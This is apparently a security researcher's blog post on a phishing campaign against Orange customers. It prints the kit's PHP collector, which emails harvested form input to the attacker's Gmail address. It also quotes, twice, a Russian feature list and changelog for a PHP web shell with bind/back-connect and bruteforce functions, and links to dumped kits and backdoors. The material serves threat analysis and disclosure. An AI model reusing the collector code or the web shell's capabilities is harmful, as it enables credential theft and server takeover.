It's the same actor as http://www.xylibox.com/2013/02/phish-bankfraud-edf-caf-and-now.html
But instead of EDF, Orange is targeted.
Phishing pages:
http://www.phishtank.com/phish_detail.php?phish_id=1724946
http://www.phishtank.com/phish_detail.php?phish_id=1724994
ghazalox.php:
$send = "ayoub.boos7@gmail.com";
$subject = "BoOooOooOs Rezuult";
$headers = "Frm: ayoub.boos7@gmail.com>";
$headers .= $_POST['eMAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
mail($send,$subject,$message,$headers);
$subject = "BoOooOooOs Rezuult";
$headers = "Frm: ayoub.boos7@gmail.com>";
$headers .= $_POST['eMAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
mail($send,$subject,$message,$headers);
Same Spam tool and same backdoors used:
Backdoor.PHP.WebShell.BD:
Something new, Turbo Force:
And various custom r57 shells:
Dumped phishings can be found here: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=2431#p18119
And backdoors here: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=2410&start=20#p18118
Bank customers reply to phishing e-mails:
And more and more e-mails...
Also i've found yesterday a changelog of Backdoor.PHP.WebShell.BD:
Данная утилита предоставляет веб-интерфейс для удаленной работы c операционной системой и ее службами/демонами.
Описание возможностей / особенности:
* Авторизация на cookies
* Информация о сервере
* Файловый менеджер (Копирование, переименование, перемещение, удаление, чмод, тач, создание файлов и папок)
* Просмотр, hexview, редактирование, скачивание, загрузка файлов
* Работа с zip архивами (упаковка, распаковка) + сжатие в tar.gz
* Консоль
* SQL менеджер (MySql, PostgreSql)
* Выполнение PHP кода
* Работа со строками + поиск хеша в онлайн базах
* Биндпорт и бек-коннект (Perl)
* Bruteforce FTP, MySQL, PgSQL
* Поиск файлов, поиск текста в файлах
* Поддержка *nix-like и Windows систем
* Антипоисковик (проверяется User-Agent, если поисковик, тогда возвращается 404 ошибка)
* Можно использовать AJAX
* Небольшой размер. Упакованная версия занимает 22.8 Kb
* Выбор кодировки, в которой работает шелл.
Чейнджлог:
2.5
* Вместо сессий теперь используется cookies
* Исправлен поиск по exploit-db.com
* Убран раздел Safe-mode
* Шелл корректно работает при disabled_functions = scandir
* Теперь можно искать не только текст в файлах, но и просто файлы по маске
* Переработан mysql dump
* Изменен список сервисов в "Search for hash"
* Убраны изображения из phpinfo()
* "Мелкая косметика"
* Исправление других мелких багов
2.4
* добавлена переменная в конфиг, отвечающая за включение/выключения ипользования AJAX по умолчанию
* улучшен раздел Sql
* новый формат дампа (более компактный)
* возможность сохранять дамп в файл (если имя файла не указано, то дамп предлагается сразу скачать)
* gui получше, навигация по таблице теперь удобней
* добавлена возможность включить/отключить подсчет количества записей в таблицах
* Load file выводиться, если у пользователя хватает привилегий
* при неудачном коннекте к бд выводиться ошибку
* добавлена возможность смотреть ошибки в Console (перенаправление stderr в stdout)
* в Sec. Info добавлен вывод модулей Apache'а
* теперь в файловом менеджере при наведении на ссылки (я про ссылки в фс) всплывает подсказка куда ведет ссылка
* можно упаковывать в tar.gz, если доступно выполнение команд.
* можно указывать названия для архивов
* ссылка на поиск сплойта под ядро теперь ведет на exploit-db.com
* попытался выделить место куда в Console вбивать команды более заметно)
* фиксы багов
Описание возможностей / особенности:
* Авторизация на cookies
* Информация о сервере
* Файловый менеджер (Копирование, переименование, перемещение, удаление, чмод, тач, создание файлов и папок)
* Просмотр, hexview, редактирование, скачивание, загрузка файлов
* Работа с zip архивами (упаковка, распаковка) + сжатие в tar.gz
* Консоль
* SQL менеджер (MySql, PostgreSql)
* Выполнение PHP кода
* Работа со строками + поиск хеша в онлайн базах
* Биндпорт и бек-коннект (Perl)
* Bruteforce FTP, MySQL, PgSQL
* Поиск файлов, поиск текста в файлах
* Поддержка *nix-like и Windows систем
* Антипоисковик (проверяется User-Agent, если поисковик, тогда возвращается 404 ошибка)
* Можно использовать AJAX
* Небольшой размер. Упакованная версия занимает 22.8 Kb
* Выбор кодировки, в которой работает шелл.
Чейнджлог:
2.5
* Вместо сессий теперь используется cookies
* Исправлен поиск по exploit-db.com
* Убран раздел Safe-mode
* Шелл корректно работает при disabled_functions = scandir
* Теперь можно искать не только текст в файлах, но и просто файлы по маске
* Переработан mysql dump
* Изменен список сервисов в "Search for hash"
* Убраны изображения из phpinfo()
* "Мелкая косметика"
* Исправление других мелких багов
2.4
* добавлена переменная в конфиг, отвечающая за включение/выключения ипользования AJAX по умолчанию
* улучшен раздел Sql
* новый формат дампа (более компактный)
* возможность сохранять дамп в файл (если имя файла не указано, то дамп предлагается сразу скачать)
* gui получше, навигация по таблице теперь удобней
* добавлена возможность включить/отключить подсчет количества записей в таблицах
* Load file выводиться, если у пользователя хватает привилегий
* при неудачном коннекте к бд выводиться ошибку
* добавлена возможность смотреть ошибки в Console (перенаправление stderr в stdout)
* в Sec. Info добавлен вывод модулей Apache'а
* теперь в файловом менеджере при наведении на ссылки (я про ссылки в фс) всплывает подсказка куда ведет ссылка
* можно упаковывать в tar.gz, если доступно выполнение команд.
* можно указывать названия для архивов
* ссылка на поиск сплойта под ядро теперь ведет на exploit-db.com
* попытался выделить место куда в Console вбивать команды более заметно)
* фиксы багов
No comments:
Post a Comment